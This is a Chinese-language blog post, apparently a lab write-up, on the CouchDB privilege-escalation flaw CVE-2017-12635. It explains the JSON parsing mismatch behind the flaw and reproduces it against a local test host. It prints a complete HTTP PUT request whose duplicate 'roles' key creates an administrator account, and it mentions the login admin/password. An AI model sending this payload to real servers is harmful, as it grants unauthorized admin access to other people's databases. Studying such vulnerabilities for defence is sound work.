






<!doctype html>
<html lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  
  <meta name="author" content="liu-ctrl">
  
  
  
  
    <meta name="description" content="CouchDB 未授权访问漏洞CVE-2017-12635
漏洞原理：Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Mee...">
  
  <title>CouchDB 未授权访问漏洞CVE-2017-12635 [ liu ]</title>
  
  
    <link rel="shortcut icon" href="/hollow.ico">
  
  
  <link rel="stylesheet" href="/css/random.css">
<link rel="stylesheet" href="/css/vegas.min.css">
<link rel="stylesheet" href="/css/highlight-railscasts.css">
<link rel="stylesheet" href="/css/jquery.fancybox.css">
<link rel="stylesheet" href="/css/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/jquery.fancybox-thumbs.css">
<link rel="stylesheet" href="/css/plyr.css">
  
</head>

<body>
<div class="side-navigate hide-area">
  
    <div class="item prev">
      <a href="/2019/07/21/1 day/5/">
        <div class="item-icon"></div>
      </a>
      <div class="item-title">
        nginx文件解析漏洞
      </div>
    </div>
  
  
    <div class="item next">
      <a href="/2019/07/20/1 day/4/">
        <div class="item-icon"></div>
      </a>
      <div class="item-title">
        APPWeb认证绕过漏洞CVE-2018-8715
      </div>
    </div>
  
</div>
<div id="outer-container" class="hide-area">
<div id="container">
  <div id="menu-outer" class="slide-down">
    <div id="menu-inner">
      <div id="brand">
        
        <a onclick="openUserCard()">
          <img id="avatar" src="https://avatars3.githubusercontent.com/u/13285397?s=460&v=4">
          <div id="homelink">liu</div>
        </a>
      </div>
      <div id="menu-list">
        <ul>
        
        
          
            <li>
          
            <a href="/index.html">Home</a>
            
          </li>
        
          
            <li>
          
            <a href="/archives">Archives</a>
            
          </li>
        
          
            <li>
          
            <a href="/tags">Tags</a>
            
          </li>
        
          
            <li>
          
            <a href="/categories">Categories</a>
            
          </li>
        
          
            <li>
          
            <a href="/about">About</a>
            
          </li>
        
          
            <li>
          
            <a href="https://github.com/Baileyswu">Github</a>
            
          </li>
        
        </ul>
      </div>
      <div id="show-menu">
        <button>Menu</button>
      </div>
    </div>
  </div>

  <div id="content-outer">
    <div id="content-inner">
      
      
  

  <article id="post">
    <h1>CouchDB 未授权访问漏洞CVE-2017-12635</h1>
    <p class="page-title-sub">
      <span id="post-title-date">Created at 2019-07-20</span>
      
        <span id="post-title-updated">Updated at 2019-07-21</span>
      
      
      
      <span id="post-title-tags">
      Tag
      
      
        
        
        <a href="/tags/CouchDB-未授权访问漏洞CVE-2017-12635/">CouchDB 未授权访问漏洞CVE-2017-12635</a>
      
      </span>
      
    </p>
    
    <h1 id="CouchDB-未授权访问漏洞CVE-2017-12635"><a href="#CouchDB-未授权访问漏洞CVE-2017-12635" class="headerlink" title="CouchDB 未授权访问漏洞CVE-2017-12635"></a>CouchDB 未授权访问漏洞CVE-2017-12635</h1><hr>
<h2 id="漏洞原理："><a href="#漏洞原理：" class="headerlink" title="漏洞原理："></a>漏洞原理：</h2><p>Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。<br>在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同，导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员，属于垂直权限绕过漏洞。<br>&emsp;<br>影响版本：小于 1.7.0 以及 小于 2.1.1<br>&emsp;<br>&emsp;</p>
<h2 id="漏洞复现："><a href="#漏洞复现：" class="headerlink" title="漏洞复现："></a>漏洞复现：</h2><p>靶机：192.168.199.217:5984<br>攻击者：192.168.199.187</p>
<ol>
<li>首先访问一下靶机</li>
</ol>
<p><img src="https://note.youdao.com/yws/public/resource/8de016f049dfd295f1df4bb4be42a572/xmlnote/WEBRESOURCEf45c3400599f2f09e07226e216dcdb92/10574" alt><br>暴漏出couchdb的版本信息等<br>访问<a href="http://192.168.199.151:5984/_utils/" target="_blank" rel="noopener">http://192.168.199.151:5984/_utils/</a></p>
<p><img src="https://note.youdao.com/yws/public/resource/8de016f049dfd295f1df4bb4be42a572/xmlnote/WEBRESOURCE98552849765d2332f033736b4f986735/10536" alt><br>选择登陆账户：admin，密码：password<br>登陆进去可以看到别人创建的用户密码等数据库<br>&emsp;<br>&emsp;</p>
<ol start="2">
<li>使用burpsuite进行抓包并修改请求内容</li>
</ol>
<p><img src="https://note.youdao.com/yws/public/resource/8de016f049dfd295f1df4bb4be42a572/xmlnote/WEBRESOURCE2862a7c922ecf79ad78aef5d3794b79d/10540" alt><br>修改请求为PUT并创建用户和密码，在user这个数据库中创建账号和密码<br>PUT /_users/org.couchdb.user:liupanpan HTTP/1.1<br>Host: 192.168.199.217:5984<br>Cache-Control: max-age=0<br>Upgrade-Insecure-Requests: 1<br>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,<em>/</em>;q=0.8,application/signed-exchange;v=b3<br>Accept-Encoding: gzip, deflate<br>Accept-Language: zh-CN,zh;q=0.9<br>If-Modified-Since: Sat, 02 Dec 2017 17:49:09 GMT<br>Connection: close<br>Content-Length: 108</p>
<p>{<br>  “type”: “user”,<br>  “name”: “liupanpan”,<br>  “roles”: [“_admin”],<br>  “roles”: [],<br>  “password”: “lpp”<br>}</p>
<p><img src="https://note.youdao.com/yws/public/resource/8de016f049dfd295f1df4bb4be42a572/xmlnote/WEBRESOURCEcd68ce1dc7a7c6f634e2f878eb78bd36/10559" alt><br>&emsp;<br>访问下图页面</p>
<p><img src="https://note.youdao.com/yws/public/resource/8de016f049dfd295f1df4bb4be42a572/xmlnote/WEBRESOURCEb3ea1d14224d390a775ea0c7e872977c/10562" alt><br>发现创建成功<br>&emsp;<br>&emsp;</p>

  </article>
  <div class="random-toc-area">
  <button class="btn-hide-toc btn-hide-toc-show" style="display: none" onclick="TOCToggle()">Show TOC</button>
  <button class="btn-hide-toc btn-hide-toc-hide" onclick="TOCToggle()">Hide TOC</button>
  <div class="random-toc">
    <h2>Table of Content</h2>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CouchDB-未授权访问漏洞CVE-2017-12635"><span class="toc-text">CouchDB 未授权访问漏洞CVE-2017-12635</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞原理："><span class="toc-text">漏洞原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞复现："><span class="toc-text">漏洞复现：</span></a></li></ol></li></ol>
  </div>
</div>

  
<nav id="pagination">
  
    <a href="/2019/07/21/1 day/5/" class="prev">&larr; Prev post nginx文件解析漏洞</a>
  

  

  
    <a href="/2019/07/20/1 day/4/" class="next">Next post APPWeb认证绕过漏洞CVE-2018-8715 &rarr;</a>
  
</nav>

  <!-- JiaThis Button BEGIN -->

<!-- JiaThis Button END -->


      
      
    </div>
  </div>

  <div id="bottom-outer">
    <div id="bottom-inner">
      Site by liu-ctrl using
      <a href="http://hexo.io">Hexo</a> & <a href="https://github.com/stiekel/hexo-theme-random">Random</a>
      <br>
      
    </div>
  </div>
</div>

</div>


<div id="user-card">
  <div class="center-field">
    <img class="avatar" src="https://avatars3.githubusercontent.com/u/13285397?s=460&v=4">
    <p id="description"></p>
    <ul class="social-icon">
  
  
    <li>
      <a href="https://github.com/Baileyswu">
        
          <i class="icon iconfont github">&#xe606;</i>
        
      </a>
    </li>
  
    <li>
      <a href="http://weibo.com/Danliwoo">
        
          <i class="icon iconfont weibo">&#xe602;</i>
        
      </a>
    </li>
  
    <li>
      <a href="mailto:wulidan0530@live.com">
        
          M
        
      </a>
    </li>
  
</ul>
  </div>
</div>


<div id="btn-view">Hide</div>

<script>
// is trigger analytics / tongji script
var isIgnoreHost = false;

if(window && window.location && window.location.host) {
  isIgnoreHost = ["localhost","127.0.0.1"].some(function(address){
    return 0 === window.location.host.indexOf(address);
  });
}

var isTriggerAnalytics = !( true && isIgnoreHost );

</script>




  
  
    <script src="/js/jquery-2.2.3.min.js"></script>
  
    <script src="/js/vegas.min.js"></script>
  
    <script src="/js/random.js"></script>
  
    <script src="/js/highlight.pack.js"></script>
  
    <script src="/js/jquery.mousewheel.pack.js"></script>
  
    <script src="/js/jquery.fancybox.pack.js"></script>
  
    <script src="/js/jquery.fancybox-thumbs.js"></script>
  
    <script src="/js/plyr.js"></script>
  

<script>

  // fancybox
  var backgroundImages = [];
  
  $('#post').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox') || $(this).parent().hasClass('fancybox-thumb')) return;
      var alt = this.alt || this.title;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'post' + i);
    });
  });
  $(".fancybox").fancybox();

var vegasConfig = {"preload­Image":true,"transition":["flash"],"timer":true,"delay":1500000,"shuffle":true,"count":12};
var unsplashConfig = {"gravity":"center"};
// is show background images
var turnoffBackgroundImage = false;




var backgroundColor = "34495E";

$(".fancybox-thumb").fancybox({
  prevEffect: 'none',
  nextEffect: 'none',
  helpers: {
    title: {
      type: 'outside'
    },
    thumbs: {
      width: 50,
      height: 50
    }
  }
});

// show video with plyr
$(".video-container iframe").each(function(i){
  var url = $(this).attr('src');
  var id = url.split('/').pop();
  var plyrContainer = document.createElement('div');
  plyrContainer.className = 'plyr';
  var plyrElement = document.createElement('div');
  plyrElement.dataset.videoId = id;
  switch(true) {
    case url.search('youtube.com') >= 0:
      plyrElement.dataset.type = 'youtube';
      break;
    case url.search('vimeo.com') >= 0:
      plyrElement.dataset.type = 'vimeo';
      break;
    default:
      return;
  };
  plyrContainer.appendChild(plyrElement);
  $(this).parent().html(plyrContainer);
});
plyr.setup('.plyr', {iconUrl: '/css/sprite.svg'});
</script>
</body>
</html>

